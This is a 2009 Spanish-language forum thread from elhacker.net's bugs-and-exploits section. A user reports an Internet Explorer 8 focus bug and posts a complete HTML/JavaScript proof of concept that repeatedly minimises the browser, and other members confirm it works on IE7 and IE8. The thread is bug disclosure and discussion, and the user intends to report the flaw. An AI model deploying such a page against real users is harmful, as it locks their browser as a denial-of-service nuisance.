elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 05:55  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  ¿Bug IE 8?		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Bug IE 8?  (Leído 2,639 veces)
SnakeDrak

Desconectado Desconectado

Mensajes: 243


[GPG: 0x9680A09E]


Ver Perfil
¿Bug IE 8?
« en: 11 Agosto 2009, 01:56 »
Hola,

No sé si alguien más descubrió este bug pero estaba tranquilamente programando una web de administración cuando para variar IE no admite una función: addEventListener, entonces busqúe la función de IE que es attachEvent.. hasta aquí todo bien, pero mi sorpresa fue cuando me di cuenta de que si pones la función blur, quita el foco al navegador y no al elemento pudiendo así minimizar el navegador cuando quieras, logrando no poder abrirlo, aquí hice un mini xploit para probar si de verdad era un BUG, y al menos en mi IE 8 el xploit funciona:

Lo único que hace es minimizar el navegador constantemente, no perjudica en nada más.

Nota: Solo funciona cuando es 1 ventana y no funciona en pestaña.

http://tod.servehttp.com/Mata_IE.html

Aquí el código:
Código
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />		
<title>Descarga Firefox, Opera, Google Chrome o Safari, tu IE ha muerto</title>
<script type="text/ &#8235; &#8235; &#8235; &#8235;javascript">
<!--
function addOnLoad(n) {
	var p = window.onload;
	if (typeof window.onload != 'function')
		window.onload = n;
	else {
		window.onload = function() {
			p();
			n();
		}
	}
}
function mfocus() {
	var d = document.getElementsByTagName('a');
	for(i=0; i<d.length; i++)
		d[i].attachEvent('onfocus', function() { setInterval(function() { this.blur(); },100); }); // IE feo
	return;
}
-->
</script>
</head>
<body>
<script type="text/ &#8235; &#8235; &#8235; &#8235;javascript">
addOnLoad(mfocus);
addOnLoad(function() { document.getElementById("matar").focus(); });
</script>
<p><a id="matar" href="#">Matar a IE</a></p>
</body>
</html>
 

Yo supongo que este BUG alguien lo habrá descubierto, pero lo hayan o no descubierto me gustaría saber si hay alguna manera de arreglarlo (a parte de reportarlo a IE, que si nadie lo ha hecho pues lo haré).

A y también comentenme si funciona por favor, aunque dudo que sea solo de mi IE (pues tengo la última versión).

EDIT: Que conste que el xploit lo hice solo para comprobar que se pueden aprovechar del BUG si colocan como página de inicio, evitando que el navegador pueda hacer nada, lo puse exactamente para saber si es posible de evitar y si esto ya ha sido descubierto.

Saludos!
« Última modificación: 11 Agosto 2009, 05:53 por SnakeDrak » En línea
Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.085


>.<


Ver Perfil WWW
Re: ¿Bug IE 8?
« Respuesta #1 en: 14 Agosto 2009, 16:30 »
Funciona :')

Citar
Windows Internet Explorer 8

Version: 8.0.6001.18702
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.225


Yo que tu lo pienso dos veces


Ver Perfil
Re: ¿Bug IE 8?
« Respuesta #2 en: 14 Agosto 2009, 16:33 »
También (aunque si funciona en el 8 era de esperarse)

Versión: 7.0.5730.11

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
SnakeDrak

Desconectado Desconectado

Mensajes: 243


[GPG: 0x9680A09E]


Ver Perfil
Re: ¿Bug IE 8?
« Respuesta #3 en: 14 Agosto 2009, 16:40 »
Hola,

¿Con funciona os referiis al xploit o a que no tiene el bug?

Saludos!
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.225


Yo que tu lo pienso dos veces


Ver Perfil
Re: ¿Bug IE 8?
« Respuesta #4 en: 14 Agosto 2009, 16:47 »
A que se minimiza y no se puede maximizar/restaurar  :P

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
SnakeDrak

Desconectado Desconectado

Mensajes: 243


[GPG: 0x9680A09E]


Ver Perfil
Re: ¿Bug IE 8?
« Respuesta #5 en: 15 Agosto 2009, 04:32 »
Hola,

Bueno pues les mandaré un mail a m$ pero dudo mucho que lo lean xD, la función mfocus puede estar mas resumida, la puse así porque ya la tenía de mi otra función y me dió pereza :p.

Saludos!
En línea
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: ¿Bug IE 8?
« Respuesta #6 en: 20 Agosto 2009, 12:37 »
@SnakeDrak

Haz enviado el mail ya? te han respondido, mi version de IE 8 NO es vulnerable.




-berz3k.

En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines